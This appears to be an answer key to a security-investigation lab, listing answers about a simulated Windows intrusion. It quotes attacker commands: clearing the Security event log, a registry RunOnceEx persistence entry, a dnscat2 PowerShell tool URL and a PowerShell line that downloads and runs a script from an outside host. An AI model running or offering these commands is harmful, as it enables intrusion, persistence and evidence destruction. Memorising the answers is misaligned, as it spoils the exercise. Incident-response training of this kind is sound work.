1. No answer needed
2. 1. Jul 3, 2023 @ 14:14:09.000
   2. config.php
   3. powershell.exe
3. 1. whoami /priv
   2. 167.71.198.43 
   3. net users
4. 1. 428
   2. Clear-EventLog -LogName Security
   3. 4240
5. 1. powershell.exe
   2. cmd /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d \"C:\Windows\Temp\installer.exe\""
6. 1. https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1
   2. powershell iwr http://www.oneedirve.xyz/321c3cf/dev.py -outfile C:\Windows\Tasks\dev.py; python3 C:\Windows\Tasks\dev.py
   3. update.exe
7. No answer needed
